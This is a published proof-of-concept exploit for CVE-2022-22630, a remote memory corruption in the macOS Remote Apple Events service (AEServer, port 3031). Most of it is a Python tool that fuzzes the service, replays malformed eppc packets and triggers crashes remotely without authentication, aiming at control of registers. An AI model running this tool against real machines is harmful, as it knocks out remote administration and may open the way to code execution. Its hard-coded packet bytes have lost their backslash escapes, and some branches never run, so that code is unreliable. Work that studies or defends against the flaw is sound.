Authored by Jeremy Brown

This is a proof of concept exploit for the Apple macOS remote events remote memory corruption vulnerability. It serves as a toolkit to help debug and trigger crashes.

advisories | CVE-2022-22630

#!/usr/bin/env python
# -*- coding: UTF-8 -*-
#
# naval.py
#
# Apple macOS Remote Events Remote Memory Corruption Vulnerability
#
# Jeremy Brown [jbrown3264/gmail]
#
# =====
# Intro
# =====
#
# [eppc] Hello from AEServer
#
# Remote Apple Events is a core service and remote system administration and automation
# tool for Macs. It can be enabled via System Preferences -> Sharing and listens on
# port tcp/3031 and may be used in enterprise environments for remote administration.
# Sending malformed packets triggers a crash in the AEServer binary which may allow for
# arbitrary code execution on the remote machine within the context of the _eppc user.
# However, the crash is subtle as the service is automatically restarted and only a log
# in /Library/Logs/DiagnosticReports/AEServer_*.crash is generated if ReportCrash is enabled.
#
# Although a controlled, reliable crash at an arbitrary location is difficult, it was
# eventually achieved during testing with repeated characters in packets during sessions.
#
# Thread 0 crashed with X86 Thread State (64-bit):
# rax: 0x4242424242424242 rbx: 0x0000000000000006 rcx: 0x0000424242424240 rdx: 0x00000000000e6370
# rdi: 0x00007fb041c0ab40 rsi: 0x0000000103d3ba00 rbp: 0x00007ffeebef99f0 rsp: 0x00007ffeebef99b8
# r8: 0x0000000000000020 r9: 0x0000000000000002 r10: 0x00007fb041c00000 r11: 0x00007fb041c0e1c0
# r12: 0x000000000000000d r13: 0x00007fff8091afe0 r14: 0x00007fb041c251b0 r15: 0x00007fb041c25218
# rip: 0x00007fff202d541f rfl: 0x0000000000010202 cr2: 0x0000424242424260
#
# While debugging it looks like the process is crashing when trying to release or
# dereference memory that has been deallocated, likely a sign of a heap related bug
# such as a use-after-free bug.
#
# This code serves as a toolkit to help debug and trigger crashes, but as mentioned
# extensive testing was required to gain more precise control of rax/rcx. Also note
# that authentication is not required to trigger service crashes locally or remotely.
#
# =======
# Details
# =======
#
# Much of the functionality depends on running this locally on the target box, such
# as debugging with ReportCrash logs, but it can certainly trigger remote crashes too
# if you pass the --remote flag (disables local debugging stuff).
#
# $ ./naval.py 10.0.0.12 --fuzz // use --original to fuzz with the non-crashing packets
# ....
#
# $ head crashes.txt
# 1 - (0x7e @ 1) -> 0x20
# [many more truncated]
#
# $ ./naval.py 10.0.0.12 --sleep --replay "1:7e:1" // pkt:byte:index
# ....
#
# Then within 10 seconds, start the debugger on the local target.. GOGOGO
#
# $ sudo lldb -o "attach --name AEServer" -o c
# ....
#
# (lldb) c
# Process 50050 resuming
# Process 50050 stopped
# * thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x7fd1d0e1bd8)
# frame #0: 0x00007fff2028341f libobjc.A.dylib`objc_release + 31
#
# And now you can explore the crash
#
# One can also check that AEServer is receiving packets:
# > dtrace -n 'syscall::*recv*:entry { printf("-> %s (pid=%d)", execname, pid); }' | grep AEServer
#
# ===
# Fix
# ===
# - Addressed in Monterey 12.3
#
# CVE-2022-22630
#

import os
import sys
import argparse
import datetime
import time
import psutil
import shutil
import signal
import socket
import random
import re

# Directory that is listed before and after sending packets to detect new
# AEServer_*.crash reports (see the header notes about ReportCrash).
REPORT_DIR = '/Library/Logs/DiagnosticReports'
# Directory (relative to the current working directory) that crash reports and
# repro files are moved/written into.
LOG_DIR = 'logs'

PORT = 3031 # eppc

# Per-run text file that fuzzing appends one "packet/byte/index -> pc" line to;
# the timestamp is taken once, at import time.
CRASH_LOG = 'crashes' + str(datetime.datetime.now().strftime("%Y%m%d_%H%M%S")) + '.txt'
# Module-level default for checking REPORT_DIR for new crash reports.
REPORT_CRASH = True
# Seconds to pause after connecting when --sleep is given (time to attach a debugger).
SLEEP_TIME = 10
# Largest value written into a packet position while fuzzing.
MAX_BYTE = 255 # 0xff

#
# original packets
#
# NOTE(review): the byte literals below contain sequences such as `x00` and
# `xe4` with no backslash. Presumably the `\x..` escapes were lost when this
# file was copied -- confirm against the upstream copy before relying on them.
#
PKT_1_ORIG = b'PPCTx00x00x00x01x00x00x00x01'
PKT_2_ORIG = b'xe4LPRTx01xe1x01xe7x06finderxdfxdbxe3x02x01=xdfxdfxdfxdfxd5x00'
PKT_3_ORIG = b'xe4SREQxdfxdfxdfxdfxdfx01xe7x06finderxdfxdbxe5x04B{xbfxacxdfxdfxdfxdfxdfxdfxdfxdfxdcxe5x04testxdfxddx00'
PKT_4_ORIG = b'x16x03x01x00x92x01x00x00x8ex03x03x61x00x8bx66x96xc7x08xa2xe8x0ex53x13xbdxd3x1cx69x12x43xd3x03xe2xecx8dx61x3dx01xedx67xd7x62xf8xcax00x00x2cx00xffxc0x2cxc0x2bxc0x24xc0x23xc0x0axc0x09xc0x08xc0x30xc0x2fxc0x28xc0x27xc0x14xc0x13xc0x12x00x9dx00x9cx00x3dx00x3cx00x35x00x2fx00x0ax01x00x00x39x00x0ax00x08x00x06x00x17x00x18x00x19x00x0bx00x02x01x00x00x0dx00x12x00x10x04x01x02x01x05x01x06x01x04x03x02x03x05x03x06x03x00x05x00x05x01x00x00x00x00x00x12x00x00x00x17x00x00'
PKT_5_ORIG = b'x16x03x03x00x46x10x00x00x42x41x04x8dxd9xbcx5fx9bx0dx86x28xdax1fxbax75xe3x01x06x73xf4x28xe2xe5x9bx2exfcx75x0cxadx3dx7dxc8x59xc0x20xcexcbxdfx87x88x09x46x1fxf3x97x3fxb8xd1xc8xf5x4bxa9x9fxdcxaexbax75x50xfax96xd5xcfxa2xa4xecx7bx61'

#
# crashing packets
#
PKT_1 = b'PPCTx00x00x00x01x00x00x00x01'
PKT_2 = b'xe4LPRTx01xe1x01xe7x06xxxyyyxdfxdbxe3x02x01=xdfxdfxdfxdfxd5x00' # s/finder/xxxyyy

class Naval(object):
    """Send eppc packets to a host and correlate the resulting AEServer crash reports.

    Driven by the parsed command-line flags, an instance sends the packets once,
    replays a saved repro file, or sequentially rewrites every byte position of
    every packet.  Unless --remote was given, REPORT_DIR is polled after each
    attempt and new AEServer crash reports are moved into LOG_DIR.

    Unless documented otherwise, methods return 0 on success and -1 on failure.
    """

    def __init__(self, args):
        """Copy the parsed command-line flags and reset per-run state.

        args -- namespace providing host, fuzz, replay, remote, reprofile,
                original and sleep attributes.
        """
        self.host = args.host
        self.fuzz = args.fuzz
        self.replay = args.replay
        self.remote = args.remote
        self.reprofile = args.reprofile
        self.original = args.original
        self.sleep = args.sleep

        # Kept on the instance so that every method sees the same decision;
        # --remote disables all local crash-report handling.
        self.report_crash = REPORT_CRASH and not args.remote

        self.pkt1 = None
        self.pkt2 = None

        # original
        self.pkt3 = None
        self.pkt4 = None
        self.pkt5 = None

        # NOTE(review): pkt_pick is only ever assigned here, so none of the
        # "pkt_pick == N" branches in sendPacket() is taken as written --
        # confirm the intended behaviour before relying on them.
        self.pkt_pick = 0

        self.pkt_num = None
        self.byte = None
        self.index = None

        # Snapshot of REPORT_DIR used to recognise reports created afterwards.
        self.logs = []

    def run(self):
        """Execute the mode selected on the command line."""
        if self.report_crash:
            #
            # sudo launchctl load -w /System/Library/LaunchAgents/com.apple.ReportCrash.plist
            #
            if 'ReportCrash' not in (proc.name() for proc in psutil.process_iter()):
                print("ReportCrash isn't running, make sure it's enabled first\n")
                return -1

            if not os.path.isdir(REPORT_DIR):
                print("dir %s doesn't exist, can't fuzz and check for crashes\n" % REPORT_DIR)
                return -1

            try:
                # Baseline listing: only reports that appear after this point
                # are treated as new by checkReports().
                self.logs = os.listdir(REPORT_DIR)
            except Exception as error:
                print("failed to list %s: %s\n" % (REPORT_DIR, error))
                return -1

        if self.original:
            # non-crashing
            self.pkt1 = PKT_1_ORIG
            self.pkt2 = PKT_2_ORIG
            self.pkt3 = PKT_3_ORIG
            self.pkt4 = PKT_4_ORIG
            self.pkt5 = PKT_5_ORIG
        else:
            # crashing
            self.pkt1 = PKT_1
            self.pkt2 = PKT_2

        if self.replay:
            pkt = self._parseReplay()

            if pkt is None:
                return -1

            print("replaying packets\n")

            # NOTE(review): the replay packet is only displayed here; the
            # packets sent afterwards are self.pkt1/self.pkt2 unchanged.
            # Confirm whether it was also meant to be sent.
            self.showRepro(pkt)

        if self.reprofile:
            if self.repro(self.reprofile) < 0:
                print("failed")
                return -1

            return 0

        if self.fuzz:
            if self._fuzzAll() < 0:
                return -1
        else:
            if self._sendOnce() < 0:
                return -1

        if self.report_crash:
            self.checkReports()

        print("done\n")

        return 0

    def _parseReplay(self):
        """Parse the "pkt:byte:index" replay string; return the modified packet or None."""
        fields = self.replay.split(':')

        if len(fields) != 3:
            print("invalid replay format: %s" % self.replay)
            return None

        try:
            self.pkt_num = int(fields[0])
        except ValueError as error:
            print("packet number %s is invalid: %s" % (fields[0], error))
            return None

        try:
            self.byte = int(fields[1], 16)
        except ValueError as error:
            print("byte %s is invalid: %s" % (fields[1], error))
            return None

        try:
            self.index = int(fields[2])
        except ValueError as error:
            print("index %s is invalid: %s" % (fields[2], error))
            return None

        if self.pkt_num == 1:
            return self.modifyPacket(self.pkt1, self.byte, self.index)

        if self.pkt_num == 2:
            return self.modifyPacket(self.pkt2, self.byte, self.index)

        print("pkt number must be 1 or 2")
        return None

    def _fuzzAll(self):
        """Run fuzzPacketSeq() over packets 1-2, plus 3-5 when --original is set."""
        numbers = [1, 2]

        if self.original:
            numbers += [3, 4, 5]

        for num in numbers:
            if num <= 2:
                print("fuzzing sequentially packet %d\n" % num)

            self.pkt_num = num

            # Looked up per iteration because showRepro()/sendPacket() may
            # rebind pkt3..pkt5 while earlier packets are being processed.
            if self.fuzzPacketSeq(getattr(self, 'pkt%d' % num)) < 0:
                print("failed")
                return -1

        return 0

    def _sendOnce(self):
        """Open one connection and send the currently selected packets in order."""
        if not self.replay:
            if self.original:
                print("sending original packets for testing\n")
            else:
                print("sending packets to trigger crash\n")

            self.showRepro([])

        sock = self.getSock()

        if sock is None:
            return -1

        try:
            try:
                sock.connect((self.host, PORT))
            except Exception as error:
                print("connect() failed: %s\n" % error)
                return -1

            if self.sleep:
                time.sleep(SLEEP_TIME)

            try:
                sock.send(self.pkt1)
                sock.recv(256)
            except Exception as error:
                print("failed to send/recv packet 1: %s\n" % error)
                return -1

            try:
                sock.send(self.pkt2)
            except Exception as error:
                print("failed to send packet 2: %s\n" % error)
                return -1

            if self.original:
                for num, payload in ((3, PKT_3_ORIG), (4, PKT_4_ORIG), (5, PKT_5_ORIG)):
                    try:
                        sock.send(payload)
                    except Exception as error:
                        print("failed to send packet %d: %s\n" % (num, error))
                        return -1
        finally:
            # Always release the descriptor, including on the early returns.
            sock.close()

        return 0

    def getSock(self):
        """Return a new TCP socket with a one second timeout, or None on failure."""
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(1)
        except Exception as error:
            print("socket() failed: %s\n" % error)
            return None

        return sock

    def fuzzPacketSeq(self, packet):
        """Walk every index of `packet`, trying each value 0..MAX_BYTE at that index.

        One connection is opened per (index, value) pair.  A failed connect()
        is retried for the same pair, without limit.
        """
        for index in range(len(packet)):
            value = 0

            #
            # flip each byte in the packet sequentially from 0 ... 255
            #
            while value <= MAX_BYTE:
                pkt = bytearray(packet)

                self.index = index
                self.byte = value

                orig = pkt[self.index]
                pkt[self.index] = self.byte

                print("pkt @ index=%d (%s -> %s)" % (self.index, hex(orig), hex(pkt[self.index])))

                sock = self.getSock()

                if sock is None:
                    return -1

                try:
                    sock.connect((self.host, PORT))
                except Exception as error:
                    print("connect() failed: %s\n" % error)
                    sock.close()  # do not leak a descriptor per retry
                    continue

                try:
                    if self.sendPacket(sock, pkt) < 0:
                        print("sendPacket() failed\n")
                        return -1
                finally:
                    sock.close()

                self.showRepro(pkt)

                if self.report_crash:
                    self.checkReports()

                value += 1

        return 0

    def createPacket(self, pkt_name):
        """Return between 8 and 4096 (inclusive) 'B' bytes; `pkt_name` is only used in the log line."""
        n = random.randint(8, 4096)

        print("created x42 x %d for %s\n" % (n, pkt_name))

        return b'B' * n

    def modifyPacket(self, pkt, byte, index):
        """Return a copy of `pkt` with the value at `index` replaced by `byte`.

        Returns None (after printing a message) when `index` is outside the
        packet or `byte` does not fit in one byte.
        """
        if (index < 0) or (index >= len(pkt)):
            print("index must be 0 - %d\n" % (len(pkt) - 1))
            return None

        if not 0 <= byte <= 255:
            print("byte must be 00 - ff\n")
            return None

        return pkt[:index] + bytes([byte]) + pkt[index + 1:]

    def sendPacket(self, sock, pkt):
        """Send the packet sequence on `sock`, using `pkt` in the slot named by pkt_pick.

        Send/receive errors are printed and otherwise ignored, so this always
        returns 0.
        """
        try:
            if self.pkt_pick == 1:
                sock.send(pkt)
            else:
                sock.send(self.pkt1)

            sock.recv(256)
        except socket.timeout:
            print("timed out")
        except Exception as error:
            print("send/recv failed for packet #1: %s\n" % error)

        try:
            if self.pkt_pick == 2:
                sock.send(pkt)
            else:
                sock.send(self.pkt2)

            if self.original:
                sock.recv(256) # not necessary for crashing packets 1 & 2
        except Exception as error:
            print("send/recv failed for packet #2: %s\n" % error)

        if self.original:
            for num in (3, 4, 5):
                attr = 'pkt%d' % num

                try:
                    if self.pkt_pick == num:
                        sock.send(pkt)
                    else:
                        #
                        # 1 means the stored packet doesn't change,
                        # 2 replaces it with a run of B's
                        #
                        if random.randint(1, 2) == 2:
                            setattr(self, attr, self.createPacket(attr))

                        sock.send(getattr(self, attr))

                    sock.recv(256)
                except Exception as error:
                    print("send/recv failed for packet #%d: %s\n" % (num, error))

        return 0

    @staticmethod
    def _parseHexLine(line):
        """Decode one repro-file line as written by getHex() (backslashes are tolerated)."""
        return bytes.fromhex(line.strip().replace('\\', '').replace('x', ''))

    def repro(self, filename):
        """Load packets from a repro file (one packet per line) and send them once."""
        print("reproing crash with %s\n" % os.path.basename(filename))

        try:
            with open(filename, 'r') as file:
                data = file.readlines()
        except Exception as error:
            print("failed to read file %s: %s" % (filename, error))
            return -1

        wanted = 5 if self.original else 2

        try:
            if len(data) < wanted:
                raise ValueError("expected %d packet lines, found %d" % (wanted, len(data)))

            packets = [self._parseHexLine(line) for line in data[:wanted]]
        except Exception as error:
            print("failed to parse repro: %s" % error)
            return -1

        self.pkt1, self.pkt2 = packets[0], packets[1]

        if self.original:
            self.pkt3, self.pkt4, self.pkt5 = packets[2:5]

        sock = self.getSock()

        if sock is None:
            return -1

        try:
            try:
                sock.connect((self.host, PORT))
            except Exception as error:
                print("connect() failed: %s\n" % error)
                return -1

            if self.sleep:
                time.sleep(SLEEP_TIME)

            try:
                sock.send(self.pkt1)
                sock.recv(256)
            except socket.timeout:
                print("timed out")
            except Exception as error:
                print("send/recv failed for packet #1: %s\n" % error)

            try:
                sock.send(self.pkt2)

                if self.original:
                    sock.recv(256) # not necessary for crashing packets 1 & 2
            except Exception as error:
                print("send/recv failed for packet #2: %s\n" % error)

            if self.original:
                for num, payload in ((3, self.pkt3), (4, self.pkt4), (5, self.pkt5)):
                    try:
                        sock.send(payload)
                        sock.recv(256)
                    except Exception as error:
                        print("send/recv failed for packet #%d: %s\n" % (num, error))
        finally:
            sock.close()

        self.showRepro([])

        if self.report_crash:
            self.checkReports()

        print("done\n")

        return 0

    def getHex(self, data):
        """Return `data` as text with each byte rendered as 'x' plus two hex digits."""
        return ''.join(f'x{byte:02x}' for byte in data)

    def printHex(self, data):
        """Print `data` in the getHex() format."""
        print(self.getHex(data))

    def showRepro(self, pkt):
        """Print the packet sequence, then reset pkt3..pkt5 to the originals.

        `pkt` is printed in place of every stored packet whose length it
        matches; pass an empty sequence to print the stored packets only.
        """
        slots = ['pkt1', 'pkt2']

        if self.original:
            slots += ['pkt3', 'pkt4', 'pkt5']

        for name in slots:
            stored = getattr(self, name)
            self.printHex(pkt if len(pkt) == len(stored) else stored)

        print()

        #
        # restore original packets
        #
        self.pkt3 = PKT_3_ORIG
        self.pkt4 = PKT_4_ORIG
        self.pkt5 = PKT_5_ORIG

    def checkReports(self):
        """Collect AEServer crash reports that appeared in REPORT_DIR since the last snapshot."""
        time.sleep(2) # make sure ReportCrash has time to do its thing

        try:
            logs_now = os.listdir(REPORT_DIR)
        except Exception as error:
            print("failed to open %s for reading: %s\n" % (REPORT_DIR, error))
            return -1

        # Set difference rather than a length comparison, so a new report is
        # still noticed when another file disappeared in the meantime.
        logs_new = sorted(set(logs_now) - set(self.logs))

        if not logs_new:
            return 0

        #
        # if we have new crash logs, grab the pc and correlate it with repro
        #
        for log in logs_new:
            if log.startswith('AEServer') and log.endswith('.crash'):
                if self._collectCrash(log) < 0:
                    return -1

        #
        # reset logs after move
        #
        try:
            self.logs = os.listdir(REPORT_DIR)
        except Exception as error:
            print("failed to list %s: %s\n" % (REPORT_DIR, error))
            return -1

        return 0

    def _collectCrash(self, log):
        """Record one crash report: extract the pc, move the report, write a repro file."""
        log_file = os.path.join(REPORT_DIR, log)

        try:
            with open(log_file, 'r') as file:
                data = file.read()
        except Exception as error:
            print("failed to read %s: %s\n" % (log, error))
            return -1

        match = re.search(r'0x(.*)', data)

        if match is not None:
            pc = '0x' + match.group(1).lstrip('0')
        else:
            print("couldn't get pc from crash log\n")
            pc = 'unknown'  # keeps the string concatenations below valid

        print("found crash @ pc=%s\n" % pc)

        # The captured text runs to the end of the line, so make it safe to
        # embed in a file name.
        pc_tag = re.sub(r'[^0-9A-Za-z_.-]', '_', pc)

        #
        # create a crash log if we're fuzzing or replaying bytes at indices
        #
        if self.fuzz:
            crash_info = "pkt #%s - (byte=%s @ index=%s) -> %s\n" % (
                self.pkt_num, hex(self.byte), self.index, pc)

            try:
                with open(CRASH_LOG, 'a') as file:
                    file.write(crash_info)
            except Exception as error:
                print("failed to write %s: %s\n" % (crash_info, error))
                return -1

        try:
            os.makedirs(LOG_DIR, exist_ok=True)
        except Exception as error:
            print("failed to mkdir %s: %s\n" % (LOG_DIR, error))

        suffix = '_%s_%s_%s.txt' % (self.byte, self.index, pc_tag)
        log_name = os.path.join(LOG_DIR, log + suffix)

        #
        # move crash log file
        #
        try:
            shutil.move(log_file, log_name)
        except Exception as error:
            print("failed to move %s: %s\n" % (log_file, error))
            return -1

        #
        # check if there's an associated .ips
        #
        ips_base = os.path.splitext(log)[0] + '.ips'
        ips_file = os.path.join(REPORT_DIR, ips_base)

        # Named after the .ips file itself so it cannot overwrite the crash
        # log that was just moved.
        ips_name = os.path.join(LOG_DIR, ips_base + suffix)

        if os.path.isfile(ips_file):
            try:
                shutil.move(ips_file, ips_name)
            except Exception as error:
                print("failed to move %s: %s\n" % (ips_file, error))
                return -1

        #
        # write repro if random fuzzing (no byte/index to replay)
        #
        # note: possible bug somewhere preventing pkt 3-5 from saving the correct repro,
        # (eg. if mutated with B's), so for now we're just extra verbose with output when
        # mutating packets and stop if pc contains 424242 so we can debug from there
        #
        repro_name = os.path.join(LOG_DIR, log + '_' + pc_tag + '_repro.txt')

        packets = [self.pkt1, self.pkt2]

        if self.original:
            packets += [self.pkt3, self.pkt4, self.pkt5]

        try:
            with open(repro_name, 'w') as file:
                # One packet per line, which is the layout repro() reads back.
                file.write('\n'.join(self.getHex(p) for p in packets))
        except Exception as error:
            print("failed to write %s: %s\n" % (repro_name, error))
            return -1

        #
        # temporary to help triage crashing packets
        #
        if '424242' in pc:
            self.showRepro([])
            sys.exit(0)

        return 0

def stop(signum, frame):
    """Signal handler: emit a blank line and end the process with status 0.

    Both arguments are supplied by the signal machinery and are not used.
    """
    print()
    raise SystemExit(0)

def arg_parse():
    """Build the command-line parser and return the parsed arguments.

    Returns a namespace with `host` (str), the boolean flags `fuzz`, `remote`,
    `original` and `sleep` (False unless given), and the optional strings
    `replay` and `reprofile` (None unless given).
    """
    parser = argparse.ArgumentParser()

    parser.add_argument("host",
        type=str,
        help="target listening on eppc port 3031")

    # Each option string is registered once; listing it twice made --help
    # show the flag as "--fuzz, --fuzz".
    parser.add_argument("--fuzz",
        default=False,
        action="store_true",
        help="sequentially exhaust bytes in each packet and display crashing PC as available")

    parser.add_argument("--remote",
        default=False,
        action="store_true",
        help="target remote hosts and turn disable local debugging support")

    parser.add_argument("--replay",
        type=str,
        help="replay crash with the following format [pkt:byte:index], eg. 2:ff:3")

    parser.add_argument("--reprofile",
        type=str,
        help="filename containing packet data on each line to replay (generated by random fuzzing)")

    parser.add_argument("--original",
        default=False,
        action="store_true",
        help="use the original non-crashing packets")

    parser.add_argument("--sleep",
        default=False,
        action="store_true",
        help="sleep helper for time to lldb attach after launchd creates the AEServer process upon connection (10 secs)")

    return parser.parse_args()

def main():
    """Install the SIGINT handler, parse arguments, run the tool and set the exit status."""
    signal.signal(signal.SIGINT, stop)

    args = arg_parse()

    nr = Naval(args)

    result = nr.run()

    # run() reports failure as -1, so test for any non-zero result; the
    # previous "> 0" check could never be true and the process always exited 0.
    if result != 0:
        sys.exit(1)


if __name__ == '__main__':
    main()